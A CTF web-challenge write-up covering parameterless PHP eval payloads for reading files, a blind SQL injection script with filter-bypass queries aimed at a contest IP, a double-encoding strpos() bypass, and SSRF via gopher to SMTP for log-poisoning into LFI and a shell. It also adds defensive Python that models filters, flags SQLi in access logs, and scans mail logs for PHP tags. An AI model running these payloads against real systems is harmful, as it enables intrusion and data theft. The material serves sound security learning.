Writeup: Fifth Shanghai University Student Network Security Contest - Web
Official writeup: Write Up | Fifth Shanghai College Student Cybersecurity Contest official WP is out
1. Decade
Source (roughly as follows):
<?php
$code = $_GET['code'];
if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) {
    if (preg_match('/readfile|if|time|local|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $code)) {
        echo 'bye~';
    } else {
        eval($code);
    }
} else {
    echo "No way!!!";
}
Analysing the regex: the recursive pattern /[a-z]+\((?R)?\)/ strips any chain of nested calls whose names are pure lowercase letters and that take no arguments, so only a lone ';' may remain. Functions can therefore be called, but they cannot be given parameters, and the second regex blocks a list of names and fragments.
My junior classmate's payload is: echo(next(file(end(scandir(chr(ord(hebrevc(crypt(phpversion(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))))));
The official WP's payload is: echo(join(file(end(scandir(next(each(scandir(chr(floor(tan(tan(atan(atan(ord(cos(chdir(next(scandir(chr(floor(tan(tan(atan(atan(ord(cos(fclose(tmpfile()))))))))))))))))))))))))))));
My junior classmate found this blog, a partial WP for ByteCTF 2019; see the shellcode part.
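To make the filter's behaviour concrete, here is a small Python model of the two checks above. It is an added example, not code from the challenge or the original post. Python's re module has no (?R) recursion, so match_call() is a hand-written matcher for /[a-z]+\((?R)?\)/ and strip_calls() mirrors the preg_replace(); the DENYLIST is copied verbatim from the challenge. nest() is a helper I added to build a parameterless call chain from a list of names.

```python
import re

# Denylist copied from the challenge's preg_match(); matched case-insensitively.
DENYLIST = re.compile(
    r"readfile|if|time|local|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log",
    re.IGNORECASE,
)


def match_call(code, i):
    r"""Match /[a-z]+\((?R)?\)/ at index i; return the end index or -1.

    A match is a lowercase name, '(', optionally one more match of the
    same shape, then ')'. Python's re has no (?R), hence this hand-written
    recursive matcher.
    """
    j = i
    while j < len(code) and "a" <= code[j] <= "z":
        j += 1
    if j == i or j >= len(code) or code[j] != "(":
        return -1
    j += 1                                   # skip '('
    inner = match_call(code, j)              # the (?R) branch
    if inner != -1 and inner < len(code) and code[inner] == ")":
        return inner + 1
    if j < len(code) and code[j] == ")":     # the empty branch: name()
        return j + 1
    return -1


def strip_calls(code):
    r"""Equivalent of preg_replace('/[a-z]+\((?R)?\)/', '', $code)."""
    out, i = [], 0
    while i < len(code):
        end = match_call(code, i)
        if end != -1:
            i = end                          # whole call chain removed
        else:
            out.append(code[i])
            i += 1
    return "".join(out)


def passes_filter(code):
    """True when the challenge's two checks would let $code reach eval()."""
    return strip_calls(code) == ";" and DENYLIST.search(code) is None


def nest(names):
    """Build names[0](names[1](...())) followed by ';' (helper added here)."""
    return "".join(f"{n}(" for n in names) + ")" * len(names) + ";"


if __name__ == "__main__":
    for sample in ["echo(phpversion());", "echo('hi');", "phpinfo();", "a(b())c();"]:
        print(f"{sample:22} stripped={strip_calls(sample)!r:14} eval={passes_filter(sample)}")
```

Two things the model makes visible: the structural check says nothing about which functions are called (a second top-level chain such as a(b())c(); also reduces to ';'), and the only thing keeping readfile, time or localtime out of a payload is the substring denylist, which is why the payloads above reach for file, next and end instead. A regex shape test plus a word denylist is not a sandbox; the defensive lesson is that eval() over user input cannot be made safe by filtering.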
Parameterless function RCE (. and ..)
var_dump(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))));
phpversion()
  returns the PHP version, e.g. 7.3.5
floor(phpversion())
  returns 7
sqrt(floor(phpversion()))
  returns 2.6457513110646
tan(floor(sqrt(floor(phpversion()))))
  returns -2.1850398632615
cosh(tan(floor(sqrt(floor(phpversion())))))
  returns 4.5017381103491
sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))
  returns 45.081318677156
ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))
  returns 46
chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))
  returns .
var_dump(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))))
  scans the current directory
next(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))))
  returns ..
echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))))))))))))));
chdir(next(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))))))
  returns true
localtime(time(true))
  returns an array
pos(localtime(time(1)))
  returns the element at the array's current pointer, i.e. tm_sec, which can be 46
readfile(end(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion()))))))))))))));
  hebrevc(crypt(arg)) produces a random hash whose first character is '$' (high probability) or '.' (low probability); ord() followed by chr() keeps only that first character.
readfile(end(scandir(chr(ord(strrev(crypt(serialize(array()))))))));
  Same idea.
Other approaches are filtered more heavily, but are still worth a look:
PHP parameterless function RCE
2. Easysql
Referenced while solving: "A summary of interesting SQL injection postures" and "SQL injection notes".
This challenge filters a lot:
- if (bypassed with case when)
- or
Bypassing or is not hard; the key point is that information_schema cannot be used. Getting the table name: MySQL InnoDB engine injection.
On MySQL 5.6 and above the mysql system database has two InnoDB-related tables, innodb_table_stats and innodb_index_stats, and querying them can stand in for information_schema.
Getting the column name: injection without column names.
select `2` from (select 1,2 union select * from fl111aa44a99g)x limit 1 offset 1
In fact ',' was also filtered, so the payload above had to be changed to:
select `3` from (select * from (select 1)a JOIN (select 2)b join (select 3)c /*!union*/ select * from fl111aa44a99g)x limit 1 offset 1
"union select" is filtered but "union" alone is not, so I used the inline comment /*!union*/; actually replacing the space with %0a also works.
My script:
import requests
import string

s = requests.session()
url = "http://47.105.183.208:29898/article.php"
payload = ''
opt = string.ascii_letters + string.digits + string.punctuation
result = ''
for x in range(1, 50):
    for i in opt.replace("%", ''):
        # sql = "select group_concat(table_name) from mysql.innodb_table_stats where database_name=database() limit 1 offset 1"
        sql = "select `3` from (select * from (select 1)a JOIN (select 2)b join (select 3)c /*!union*/ select * from fl111aa44a99g)x limit 1 offset 1"
        # sql = "select `2` from (select 1,2 union select * from article_fl111aa44a99g)x limit 1 offset 1"
        payload = "1'=(case when (%s) like '%s%%' then 1 else 0 end)='1" % (sql, result + i)
        params = {
            'id': payload,
        }
        # print(payload)
        response = s.get(url, params=params)
        if '2333333333333' in response.text:
            result += i
            break
    if '%' in result:
        break
print(result)
# database: cccttffff
# table: article, fl111aa44a99g
Some experts said a plain union injection works directly, which seems plausible.
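From the defender's side, the script above leaves a very recognisable trail in the web server's access log: hundreds of requests whose id parameter carries a quote breakout, "case when", a LIKE prefix probe and the /*!union*/ comment. The following Python is an added example (not part of the original writeup) that URL-decodes the query string of combined-format log lines and flags those patterns. The log lines are constructed here with make_line(); the IPs, timestamp and user agent are made up.

```python
import re
from urllib.parse import parse_qsl, quote_plus, urlsplit

# Combined-log prefix: client, identd, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Each rule is applied to the URL-decoded value of every query parameter.
RULES = [
    ("boolean-blind CASE WHEN", re.compile(r"\bcase\s+when\b", re.I)),
    ("quote breakout into comparison", re.compile(r"'\s*=\s*\(")),
    ("MySQL version comment /*!", re.compile(r"/\*!")),
    ("LIKE prefix probe", re.compile(r"\blike\s+'[^']*%'", re.I)),
    ("innodb stats tables", re.compile(r"\binnodb_(?:table|index)_stats\b", re.I)),
]


def decoded_param_values(target):
    """URL-decode every query-string value of a request target (path?query)."""
    return [value for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True)]


def classify(line):
    """Return (ip, target, reasons) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    reasons = []
    for value in decoded_param_values(m["target"]):
        for label, rule in RULES:
            if rule.search(value) and label not in reasons:
                reasons.append(label)
    return m["ip"], m["target"], reasons


def suspicious(lines):
    """Filter to [(ip, reasons)] for the lines that trip at least one rule."""
    hits = []
    for line in lines:
        parsed = classify(line)
        if parsed is not None and parsed[2]:
            hits.append((parsed[0], parsed[2]))
    return hits


def make_line(ip, id_value, status=200):
    """Constructed combined-log line for GET /article.php?id=<id_value>."""
    return (f'{ip} - - [10/Nov/2019:12:00:00 +0800] '
            f'"GET /article.php?id={quote_plus(id_value)} HTTP/1.1" {status} 512 '
            f'"-" "python-requests/2.22.0"')


# Constructed sample traffic: one normal request and two probes shaped like the script above.
SAMPLE_LINES = [
    make_line("10.0.0.5", "1"),
    make_line("10.0.0.9", "1'=(case when (select `3` from (select * from (select 1)a JOIN (select 2)b "
                          "join (select 3)c /*!union*/ select * from fl111aa44a99g)x limit 1 offset 1) "
                          "like 'a%' then 1 else 0 end)='1"),
    make_line("10.0.0.9", "1'=(case when (select group_concat(table_name) from mysql.innodb_table_stats "
                          "where database_name=database() limit 1 offset 1) like 'c%' then 1 else 0 end)='1"),
]

if __name__ == "__main__":
    for ip, reasons in suspicious(SAMPLE_LINES):
        print(ip, ", ".join(reasons))
```

Decoding before matching matters: in the raw log the payload appears as %27%3D%28case+when..., so a rule written against the encoded text would miss trivial re-encodings. The same rules work as a WAF or SIEM signature, but the actual fix for the application is a parameterised query for id, which makes the whole case-when trick a literal string the database never interprets.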
3. Babyt5
A recycled challenge, sigh: the June Anheng Cup web2 SSRF challenge.
Double URL-encoding bypasses strpos()
https://bugs.php.net/bug.php?id=76671&edit=1
Description:
The bug relates to sending an encoded string to strpos(): when we sent a double-encoded string we were able to bypass the verification, using %2570hp if the check is something like strpos($string, "php").
Test script:
<?php
$x = $_GET['x']; //?x=file:///var/www/html/readme.%2570hp
$pos = strpos($x, "php");
if ($pos) {
    exit("denied");
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$x");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
echo $result;
Expected result:
----------------
denied
Actual result:
--------------
<?php
//readme
?>
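The root cause in the bug report is a mismatch between how many times each layer decodes: the web server decodes the query string once before strpos() sees it, and curl's file:// handler decodes the remaining %70 a second time, so "php" only exists after the check has run. The Python below is an added example (not from the bug report or the writeup) that models the received value with as_php_receives() and contrasts the report's substring check with one that canonicalises first, decoding until the string stops changing and testing at every stage.

```python
from urllib.parse import unquote


def as_php_receives(raw_query_value):
    """Model of what $_GET hands to the script: the web server decodes the
    query string exactly once, so '%2570hp' arrives as '%70hp'."""
    return unquote(raw_query_value)


def naive_denies(value, needle="php"):
    """The bug report's check: a plain substring test on the received value."""
    return needle in value


def canonical_denies(value, needle="php", max_rounds=3):
    """Decode until the value stops changing (bounded) and test the needle at
    every stage, case-insensitively, so a second decoding step downstream
    (here: curl's file:// handler) cannot reveal a 'php' the check never saw."""
    current = value
    for _ in range(max_rounds + 1):
        if needle.lower() in current.lower():
            return True
        decoded = unquote(current)
        if decoded == current:
            return False            # fully decoded, needle never appeared
        current = decoded
    return True                     # still changing after max_rounds: refuse


if __name__ == "__main__":
    received = as_php_receives("file:///var/www/html/readme.%2570hp")
    print(received)                      # file:///var/www/html/readme.%70hp
    print(naive_denies(received))        # False: this is the bypass
    print(canonical_denies(received))    # True
```

Canonicalising closes the encoding gap, but a substring denylist on a user-supplied URL stays fragile (other encodings, other extensions, other schemes). The robust fix for this kind of fetcher is an allowlist of scheme and host, checked after parsing and, for SSRF, after DNS resolution, rather than looking for "php" in the string.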
SSRF: use the gopher protocol to attack the SMTP service, then combine with LFI to get a shell
https://github.com/tarunkant/Gopherus
First read /etc/hosts to get the internal network IP, then try the neighbouring IPs: one host has port 25 open, an SMTP service. With the gopher protocol we can send mail to that machine, so the backdoor gets written into the mail log.
Linux mail log paths are usually:
/var/log/maillog
/var/log/mail.log
/var/adm/maillog
/var/adm/syslog/mail.log
Including the log file through the LFI then gives a shell.
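The thing that makes this chain work is that the mail daemon faithfully logs what a client sent it, so the mail log ends up containing PHP source. A cheap detective control is to scan exactly the log paths listed above for PHP open tags, which have no business in a mail log. The Python below is an added example, not part of the writeup; the Postfix-style sample lines are constructed, and scan_paths() simply skips paths that do not exist on the host it runs on.

```python
import re
from pathlib import Path

# The mail log locations listed above.
MAIL_LOG_PATHS = [
    "/var/log/maillog",
    "/var/log/mail.log",
    "/var/adm/maillog",
    "/var/adm/syslog/mail.log",
]

# A PHP open tag ('<?php' or the short echo tag '<?=') is what an include()
# of this file would start executing; nothing legitimate writes it to a mail log.
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.I)


def find_php_tags(lines):
    """Return [(line_number, line)] for every line carrying a PHP open tag."""
    return [(n, line.rstrip("\n")) for n, line in enumerate(lines, 1) if PHP_TAG.search(line)]


def scan_paths(paths=MAIL_LOG_PATHS):
    """Scan whichever of the given logs exist on this host; returns {path: hits}."""
    report = {}
    for p in paths:
        path = Path(p)
        if not path.is_file():
            continue
        with path.open(errors="replace") as fh:
            hits = find_php_tags(fh)
        if hits:
            report[p] = hits
    return report


# Constructed sample: two ordinary Postfix lines and one where the daemon
# logged the raw, non-SMTP input a client sent it (placeholder PHP, not a real shell).
SAMPLE_LOG = [
    "Nov 10 12:00:01 web postfix/smtpd[1203]: connect from unknown[10.0.0.9]\n",
    "Nov 10 12:00:02 web postfix/smtpd[1203]: NOQUEUE: reject: RCPT from unknown[10.0.0.9]: "
    "554 5.7.1 <x@example.test>: Relay access denied\n",
    "Nov 10 12:00:03 web postfix/smtpd[1203]: warning: non-SMTP command from unknown[10.0.0.9]: "
    "<?php echo 'poisoned'; ?>\n",
]

if __name__ == "__main__":
    for n, line in find_php_tags(SAMPLE_LOG):
        print(f"sample line {n}: {line}")
    for path, hits in scan_paths().items():
        print(f"{path}: {len(hits)} suspicious line(s)")
```

Run from cron or a log shipper, a hit here is a high-confidence indicator that someone is attempting log poisoning. The preventive side is to keep the application from being able to include arbitrary paths at all (an allowlist of includable files), since once an LFI exists any log the web server can read becomes a candidate.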
4. lol2
Not reproduced; the official WP doesn't cover it either.